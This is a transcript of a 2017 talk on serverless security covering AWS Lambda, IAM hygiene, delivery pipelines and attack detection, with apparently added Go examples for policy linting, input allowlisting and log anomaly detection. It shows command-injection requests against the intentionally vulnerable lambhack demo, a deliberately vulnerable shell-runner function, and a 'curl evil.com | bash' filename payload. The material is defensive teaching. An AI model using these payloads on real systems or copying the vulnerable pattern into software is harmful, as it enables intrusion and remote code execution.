serverless security: a pragmatic primer for builders and defenders
TRANSCRIPT
Velocity San Jose 2017 @WICKETT
SERVERLESS SECURITY: A PRAGMATIC PRIMER
FOR BUILDERS AND DEFENDERS
JAMES WICKETT
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
Don’t worry, this is not a thinly veiled vendor pitch.
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
WHAT IS SERVERLESS?
MISCONCEPTIONS
IT’S MARKETING (CLOUD REBRANDED)
SERVERLESS == NO SERVERS
SERVERLESS == BACKEND AS A SERVICE
SERVERLESS == PLATFORM AS A SERVICE
TK: ADRIANCO QUOTE
SO, WHAT IS SERVERLESS?
http://martinfowler.com/articles/serverless.html
@MIKEBROBERTS
‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES
‣ LATE 2014 - AWS LAUNCHED LAMBDA
‣ JULY 2015 - AWS LAUNCHED API GATEWAY
‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA
‣ 2015 TO PRESENT - FRAMEWORKS FORMING
‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED
‣ 2016 - SERVERLESS CONFERENCES STARTED
HISTORY OF SERVERLESS
[Chart: waste vs. value across hardware, VMs and serverless; inspiration from @adrianco]
Decomposed Microservice Architecture
WHAT CAN WE SAY IS SERVERLESS?
SERVERLESS IS FUNCTIONS AS A SERVICE
(FaaS)
CONTAINERS ON DEMAND
SERVERLESS IS (NO MANAGEMENT OF)
SERVERS
SERVERLESS IS SERVICEFULL
SERVERLESS IS AN OPINIONATED
FRAMEWORK FOR COMPUTE AND
CONTAINERS
If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve. - @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
THE CLOUD WAS TO VIRTUALIZATION AS
SERVERLESS WILL BE TO CONTAINERS
Serverless encourages functions as deploy units, coupled with third party services that allow
running end-to-end applications without worrying about system
operation.
SERVERLESS DEFINITION
SO, WHAT ARE THE UPSIDES?
SCALING BUILT IN
PAY FOR WHAT YOU USE IN 100MS INCREMENTS
WITH SERVERLESS SYSTEM ADMINISTRATION IS
(MOSTLY) LOWER
SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE
RUNTIME CLOSER TO DEVS
YOU CAN SKIP DOCKERING ALL THE
THINGS!
GREAT, WHAT’S THE CATCH?
Ops burden to rationalize serverless model
@patrickdebois
VENDOR LOCK-IN
MONITORING
LOGGING
RELIABILITY
‣ APP NEEDS LARGE LOCAL DISK SPACE
‣ LONG RUNNING JOBS
‣ BIG I/O TASKS
‣ LATENCY SENSITIVE REQUESTS THAT CAN’T WAIT FOR THE COLD-STARTUP TIME
SERVERLESS DEAL KILLERS (PROBABLY)
SERVERLESS USE CASES
MESSAGE PROCESSING
(source: http://martinfowler.com/articles/serverless.html)
API GATEWAY
(source: http://martinfowler.com/articles/serverless.html)
WEB APPLICATIONS
‣ CI/CD
‣ AUTH
‣ WORDPRESS SCRAPER
‣ EVENT INGESTION
‣ CHATBOTS
‣ LOAD TESTING
MORE SERVERLESS USE CASES
Security
LETS TRY A SAMPLE APPLICATION IN AWS
‣ SERVERLESS
‣ APEX
‣ GO SPARTA
‣ KAPPA
STEP 1: PICK A FRAMEWORK
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
‣ BUILD A WORD CLOUD GENERATOR
‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES
‣ RETURN JSON WITH COUNTS OF WORDS IN TEXT
‣ KEEP IT SIMPLE
STEP 2: IDEA!
‣ (USING GO SPARTA FOR THE FRAMEWORK)
‣ LAMBDA
‣ S3
‣ API GATEWAY
STEP 3: DESIGN AND ARCHITECTURE
STEP 4: WRITE THE HANDLER
STEP 5: SETUP API GATEWAY
STEP 6: SET THE CONFIG DETAILS
STEP 7: PROVISION YOUR APP!
STEP 8: SETUP STRICT IAM POLICIES
STEP 9: GIVE UP AND SET LOOSE IAM POLICIES, PROMISE TO FIX LATER
STEP 10: PROVISION YOUR APP!
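Steps 8 to 10 are where most serverless projects quietly lose least privilege: the strict policy is hard to get right under deadline, so the loose one ships. The Go program below is an added example, not part of this deck or of Go Sparta. It is a small linter that parses an IAM policy document and flags the step 9 shortcut (an Allow statement with a wildcard action such as `*` or `s3:*`, or a bare `*` resource), run against a constructed strict policy for the word cloud function and the loose one beside it. The bucket name, log group, region and account ID are made up for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Statement is the subset of an IAM statement this linter inspects. Action and
// Resource are kept as json.RawMessage because IAM accepts a string or a list.
type Statement struct {
	Effect   string          `json:"Effect"`
	Action   json.RawMessage `json:"Action"`
	Resource json.RawMessage `json:"Resource"`
}

// Policy is an IAM policy document.
type Policy struct {
	Version   string      `json:"Version"`
	Statement []Statement `json:"Statement"`
}

// asList normalises a string-or-list JSON value into a []string.
func asList(raw json.RawMessage) ([]string, error) {
	if len(raw) == 0 {
		return nil, nil
	}
	var one string
	if err := json.Unmarshal(raw, &one); err == nil {
		return []string{one}, nil
	}
	var many []string
	if err := json.Unmarshal(raw, &many); err != nil {
		return nil, fmt.Errorf("Action/Resource must be a string or a list: %w", err)
	}
	return many, nil
}

// LintPolicy returns one finding per over-broad grant: an Allow statement whose
// action is "*" or "service:*", or whose resource is the bare wildcard "*".
// An empty result means every grant names a specific action and resource.
func LintPolicy(doc string) ([]string, error) {
	var p Policy
	if err := json.Unmarshal([]byte(doc), &p); err != nil {
		return nil, err
	}
	var findings []string
	for i, st := range p.Statement {
		if st.Effect != "Allow" {
			continue
		}
		actions, err := asList(st.Action)
		if err != nil {
			return nil, err
		}
		resources, err := asList(st.Resource)
		if err != nil {
			return nil, err
		}
		for _, a := range actions {
			if a == "*" || strings.HasSuffix(a, ":*") {
				findings = append(findings, fmt.Sprintf("statement %d: wildcard action %q", i, a))
			}
		}
		for _, r := range resources {
			if r == "*" {
				findings = append(findings, fmt.Sprintf("statement %d: wildcard resource %q", i, r))
			}
		}
	}
	return findings, nil
}

// StrictPolicy is a constructed step 8 policy for the word cloud function:
// read one S3 prefix and write its own CloudWatch log group. Names are made up.
const StrictPolicy = `{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject"],
     "Resource": "arn:aws:s3:::wordcloud-sources/texts/*"},
    {"Effect": "Allow",
     "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
     "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/wordcloud:*"}
  ]
}`

// LoosePolicy is the step 9 shortcut: everything on everything.
const LoosePolicy = `{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
}`

func main() {
	for name, doc := range map[string]string{"strict": StrictPolicy, "loose": LoosePolicy} {
		findings, err := LintPolicy(doc)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%s: %d finding(s) %v\n", name, len(findings), findings)
	}
}
```

Wired into the delivery pipeline as a pre-provision gate, a non-empty finding list fails the build, so "promise to fix later" becomes a failing check rather than a sticky note. The linter deliberately leaves scoped wildcards such as the `texts/*` prefix alone and only flags grants whose action or resource is unbounded; add `NotAction` and `NotResource` handling before relying on it for policies you did not write yourself.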
APP IN AWS CONSOLE
TEST LAMBDA EXEC IN CONSOLE
FIRST RUN OF 343MS
SECOND RUN ONLY TOOK 84MS
API GATEWAY IN CONSOLE
API GATEWAY EXECUTION IN CONSOLE
RETURNED JSON
MONITORING LAMBDA IN CONSOLE
WHAT I LEARNED ABOUT SERVERLESS SECURITY
SECURITY
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
(source: @devsecops)
‣ THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW
‣ A CHANGE FROM THE PAST, WHEN THE INDUSTRY ENDURED NUMEROUS FIRE DRILLS (E.G. SHELLSHOCK, HEARTBLEED) FOR VULNERABILITIES INHERITED FROM THE OS AND SYSTEM LIBRARIES RATHER THAN FROM OUR OWN CODE
SURFACE AREA REDUCTION
‣ TLS CONTROL TO THE PROVIDER
‣ ROUTING CONTROL TO THE PROVIDER
‣ CONSUMPTION OF THIRD PARTY SERVICES
‣ IAM ROLES AND POLICY CONFUSION
SURFACE AREA EXPANSION
SSL / TLS FROM THE PROVIDER
OLD WAY
NEW WAY
ROUTING FROM THE PROVIDER
ROUTING THE OLD WAY
ROUTING THE NEW WAY
Lambda + s3 + kinesis + DynamoDB +
cloudformation + API Gateway + Auth0
SERVICE AND 3RD PARTY EXPANSION
IAM ROLES AND POLICIES
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
Recommendation: Use a third-party service to monitor for provider config changes
‣ DISABLE ROOT ACCESS KEYS
‣ MANAGE USERS WITH PROFILES
‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM
‣ SECURE KEYS IN DEV SYSTEM
‣ USE PROVIDER MFA
USE GOOD HYGIENE WITH YOUR PROVIDER
DELIVERY PIPELINE SECURITY
UNIT TESTING
EASIER TO MOCK
HARDER TO MOCK
UNIT TESTING EVEN MORE CRITICAL AS
INTEGRATION TESTING IN DEV IS
HARDER
‣ USE OF A STAGING OR PRE-PROD ENV
‣ END TO END SYNTHETIC INTEGRATION TESTS
‣ ALL THE USUAL SUSPECTS
INTEGRATION TESTING
CONFIGURATION IS PART OF DELIVERY
‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’
‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-PROD
‣ INTEGRATION TESTS MUST PASS IN THIS ENV
‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION
‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM
GOOD PIPELINE PRACTICES
‣ BDD-SECURITY - GITHUB.COM/CONTINUUMSECURITY/BDD-SECURITY
‣ GAUNTLT - GAUNTLT.ORG
‣ GITHUB.COM/GAUNTLT/GAUNTLT
‣ DOCKER RECOMMENDED
SECURITY TESTING TOOLS
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
GAUNTLT WORKSHOP IN 9 EXAMPLES
DATA FLOW
‣ DEVELOPMENT
  ‣ DATA FLOW DIAGRAMS
  ‣ THREAT MODELING
‣ RUNTIME
  ‣ LOGGING
  ‣ CUSTOM MONITORS/METRICS
Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner.
https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
‣ SPOOFING CONSUMED RESOURCES
‣ DENIAL OF SERVICE
‣ TIMEOUTS
‣ EXECUTION RESTRICTIONS FOR RESOURCES
‣ CAPACITY ISSUES
DATA FLOW SECURITY
ATTACK DETECTION
DOES APPLICATION SECURITY STILL MATTER?
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL
RELEVANT 15 YEARS LATER!
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO MAKE THE POINT THAT APPSEC IS STILL RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
lambhack is a vulnerable serverless lambda application
It would certainly be a bad idea to base any coding patterns off
what you see here.
BAD CODE IS BAD CODE, EVEN IN SERVERLESS…
```go
// lambhack: the "args" query-string value is handed straight to a shell
// runner, so anyone who can reach the endpoint gets arbitrary command execution.
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
```
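Those two lines are the whole bug, and the fix is not a filter on the string. The Go program below is an added example, not lambhack's or Sparta's own code: it reproduces the vulnerable pattern beside a hardened form in which the request can only pick an entry from a fixed allowlist of argument vectors, and the process is started without a shell, so the `;+sleep+1` trick on the following slides has nothing to break out of. The `Event` type and the `allowedCommands` table are constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"strings"
)

// Event is a stand-in for the API Gateway event lambhack reads; only the
// query-string map matters here. Constructed for this example.
type Event struct {
	QueryParams map[string]string
}

// vulnerableRun mirrors the lambhack pattern: the untrusted "args" value goes
// to a shell unchanged, so "uname -a; sleep 1" runs both commands.
func vulnerableRun(ev Event) (string, error) {
	out, err := exec.Command("sh", "-c", ev.QueryParams["args"]).CombinedOutput()
	return string(out), err
}

// allowedCommands maps each request keyword to a fixed argv. The request may
// choose an entry; it cannot add flags, paths or a second command.
var allowedCommands = map[string][]string{
	"uname":   {"uname", "-a"},
	"version": {"cat", "/proc/version"},
}

// ResolveCommand validates "args" against the allowlist and returns the argv
// to execute. Anything else, including any shell metacharacter, is rejected
// before a process is started.
func ResolveCommand(ev Event) ([]string, error) {
	key := strings.TrimSpace(ev.QueryParams["args"])
	argv, ok := allowedCommands[key]
	if !ok {
		return nil, errors.New("args: not an allowed command")
	}
	// Return a copy so callers cannot mutate the allowlist.
	return append([]string(nil), argv...), nil
}

// hardenedRun executes the resolved argv directly, with no shell in between,
// so there is no command string for an attacker to break out of.
func hardenedRun(ev Event) (string, error) {
	argv, err := ResolveCommand(ev)
	if err != nil {
		return "", err
	}
	out, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return string(out), err
}

func main() {
	payload := Event{QueryParams: map[string]string{"args": "echo first; echo injected"}}
	out, _ := vulnerableRun(payload)
	fmt.Printf("vulnerable: %q\n", out) // both echo commands run
	if _, err := hardenedRun(payload); err != nil {
		fmt.Println("hardened:", err) // rejected before any exec
	}
	out, _ = hardenedRun(Event{QueryParams: map[string]string{"args": "uname"}})
	fmt.Printf("hardened uname: %q\n", out)
}
```

The point of the allowlist is that the request selects behaviour rather than supplying it; if the function genuinely needs user-controlled arguments, they go into the argv slice as separate elements and are validated against the narrowest pattern the feature allows, never concatenated into a string for `sh -c`.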
![Page 110: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/110.jpg)
With command execution available to us in lambhack, we can poke around the container a bit
![Page 111: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/111.jpg)
UNAME -A
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
![Page 112: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/112.jpg)
CAT /PROC/VERSION
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
![Page 113: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/113.jpg)
LET’S LOOK IN /TMP
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
> total 17916
> drwx------  2 sbx_user1056 490     4096 Feb 8 22:02 .
> drwxr-xr-x 21 root         root    4096 Feb 8 21:47 ..
> -rwxrwxr-x  1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
![Page 114: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/114.jpg)
LAMBDA REUSE IN ACTION!
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
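The slide above demonstrates that a file written to /tmp in one invocation is still there in the next, because Lambda reuses the warm container. A function that assumes its scratch space is empty at start is therefore wrong both for correctness and for detection. As an added example (not lambhack's code), the helper below inventories the scratch directory at invocation start, reports anything not on an expected list, and optionally removes it; the expected-file set is a parameter, and `Sparta.lambda.amd64` from the slide's `ls` output is used as the one expected entry.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"sort"
)

// Added example, not lambhack code. On Lambda the scratch directory is /tmp;
// main() uses the OS temp dir so the program also runs on a workstation.

// auditScratch returns the names of entries in dir that are not in the
// expected set, sorted for stable logging. When purge is true the unexpected
// entries are removed so state cannot leak between invocations. Both the
// directory and the expected set are caller-supplied assumptions.
func auditScratch(dir string, expected map[string]bool, purge bool) ([]string, error) {
	entries, err := os.ReadDir(dir)
	if err != nil {
		return nil, err
	}
	var unexpected []string
	for _, e := range entries {
		if expected[e.Name()] {
			continue
		}
		unexpected = append(unexpected, e.Name())
		if purge {
			if err := os.RemoveAll(filepath.Join(dir, e.Name())); err != nil {
				return unexpected, err
			}
		}
	}
	sort.Strings(unexpected)
	return unexpected, nil
}

func main() {
	dir := os.TempDir() // "/tmp" inside a Lambda container
	expected := map[string]bool{"Sparta.lambda.amd64": true} // name taken from the slide's ls output
	leftovers, err := auditScratch(dir, expected, false)
	if err != nil {
		fmt.Println("audit failed:", err)
		return
	}
	for _, name := range leftovers {
		// In a real function this would be emitted as a structured event
		// so the monitoring side can see that a previous invocation wrote it.
		fmt.Println("unexpected file in scratch dir:", name)
	}
}
```

Run with `purge` set to true at the top of the handler and the `touch /tmp/wickettfile` from the slide survives only until the next invocation, and its appearance is logged rather than silently tolerated.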
![Page 115: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/115.jpg)
WHICH CURL
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
![Page 116: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/116.jpg)
‣ ADD XSS
‣ ADD OTHER INJECTION ATTACKS
‣ ADD AUTH VECTORS
‣ …
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
![Page 117: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/117.jpg)
‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO
‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE
‣ DETECT LONGER RUN TIMES
‣ HIGHER ERROR RATE OCCURRENCES
‣ DATA INGESTION
‣ LOG ACTIONS OF LAMBDAS
APPSEC THOUGHTS
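The detection bullets above (longer run times, higher error rates, logging the actions of Lambdas) can be worked directly from the per-invocation `REPORT` line the Lambda runtime writes to CloudWatch, as an added example that is not part of the deck. The log lines below are constructed to follow that `REPORT RequestId: … Duration: … ms` format, the request ids are placeholders, and the timeout line is modelled on the runtime's "Task timed out" message; the 1012 ms invocation stands in for a `; sleep 1` style injection like the ones on the lambhack slides.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"sort"
	"strconv"
	"strings"
)

// Constructed sample (not real CloudWatch output) shaped like the runtime's
// REPORT lines for one function. req-0004 mimics an injected "sleep 1";
// req-0007 mimics an invocation that hit its timeout.
const sampleLog = `REPORT RequestId: req-0001 Duration: 12.40 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
REPORT RequestId: req-0002 Duration: 15.10 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
REPORT RequestId: req-0003 Duration: 13.80 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
REPORT RequestId: req-0004 Duration: 1012.70 ms Billed Duration: 1100 ms Memory Size: 128 MB Max Memory Used: 33 MB
REPORT RequestId: req-0005 Duration: 14.00 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
REPORT RequestId: req-0006 Duration: 16.30 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
2017-06-20T18:05:09.334Z req-0007 Task timed out after 3.00 seconds
REPORT RequestId: req-0007 Duration: 3000.00 ms Billed Duration: 3000 ms Memory Size: 128 MB Max Memory Used: 33 MB
REPORT RequestId: req-0008 Duration: 13.20 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
`

type Invocation struct {
	RequestID  string
	DurationMs float64
	Errored    bool
}

var (
	reportRe  = regexp.MustCompile(`^REPORT RequestId: (\S+)\s+Duration: ([0-9.]+) ms`)
	timeoutRe = regexp.MustCompile(`^\S+\s+(\S+)\s+Task timed out`)
)

// parseLog correlates REPORT and timeout lines by RequestId and returns the
// invocations in the order their REPORT lines appear.
func parseLog(log string) []Invocation {
	errored := map[string]bool{}
	var invs []Invocation
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		line := sc.Text()
		if m := timeoutRe.FindStringSubmatch(line); m != nil {
			errored[m[1]] = true
			continue
		}
		if m := reportRe.FindStringSubmatch(line); m != nil {
			d, err := strconv.ParseFloat(m[2], 64)
			if err != nil {
				continue // malformed duration: skip rather than guess
			}
			invs = append(invs, Invocation{RequestID: m[1], DurationMs: d})
		}
	}
	for i := range invs {
		invs[i].Errored = errored[invs[i].RequestID]
	}
	return invs
}

// medianDuration is the baseline the slow-call check is measured against.
func medianDuration(invs []Invocation) float64 {
	if len(invs) == 0 {
		return 0
	}
	d := make([]float64, len(invs))
	for i, inv := range invs {
		d[i] = inv.DurationMs
	}
	sort.Float64s(d)
	n := len(d)
	if n%2 == 1 {
		return d[n/2]
	}
	return (d[n/2-1] + d[n/2]) / 2
}

// flagSlow returns RequestIds whose duration exceeds factor x median, with a
// floor so a function with a tiny baseline does not alert on jitter.
func flagSlow(invs []Invocation, factor, floorMs float64) []string {
	threshold := factor * medianDuration(invs)
	if threshold < floorMs {
		threshold = floorMs
	}
	var ids []string
	for _, inv := range invs {
		if inv.DurationMs > threshold {
			ids = append(ids, inv.RequestID)
		}
	}
	return ids
}

// errorRate is the fraction of invocations that errored (here: timed out).
func errorRate(invs []Invocation) float64 {
	if len(invs) == 0 {
		return 0
	}
	n := 0
	for _, inv := range invs {
		if inv.Errored {
			n++
		}
	}
	return float64(n) / float64(len(invs))
}

func main() {
	invs := parseLog(sampleLog)
	fmt.Printf("invocations=%d median=%.2fms errorRate=%.3f\n", len(invs), medianDuration(invs), errorRate(invs))
	for _, id := range flagSlow(invs, 10, 500) {
		fmt.Println("slow invocation, pull the request log for:", id)
	}
}
```

The flagged request ids are the hook back to the last bullet: once an invocation stands out on duration or error, the function's own log lines for that RequestId are where you look for what it actually executed.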
![Page 118: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/118.jpg)
APPLICATION SECURITY IS STILL RELEVANT
![Page 119: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/119.jpg)
‣ New surface area, similar appsec problems
‣ Command Exec
‣ XSS
‣ Injection Attacks
‣ Try new things, e.g. appending ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
![Page 120: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/120.jpg)
‣ LOGGING, EMITTING EVENTS
‣ USAGE METRICS
‣ VANDIUM (SQLI) WRAPPER
‣ CONTENT SECURITY POLICY (CSP)
‣ MORE THINGS NEED TO BE DONE HERE…
DEFENSE
![Page 121: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/121.jpg)
Development in serverless is easier than ever and is attracting new developers to web development; as a result, application security will see a rise.
FINAL THOUGHT
![Page 122: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/122.jpg)
![Page 123: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/123.jpg)
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
![Page 124: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/124.jpg)
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
![Page 125: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/125.jpg)
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]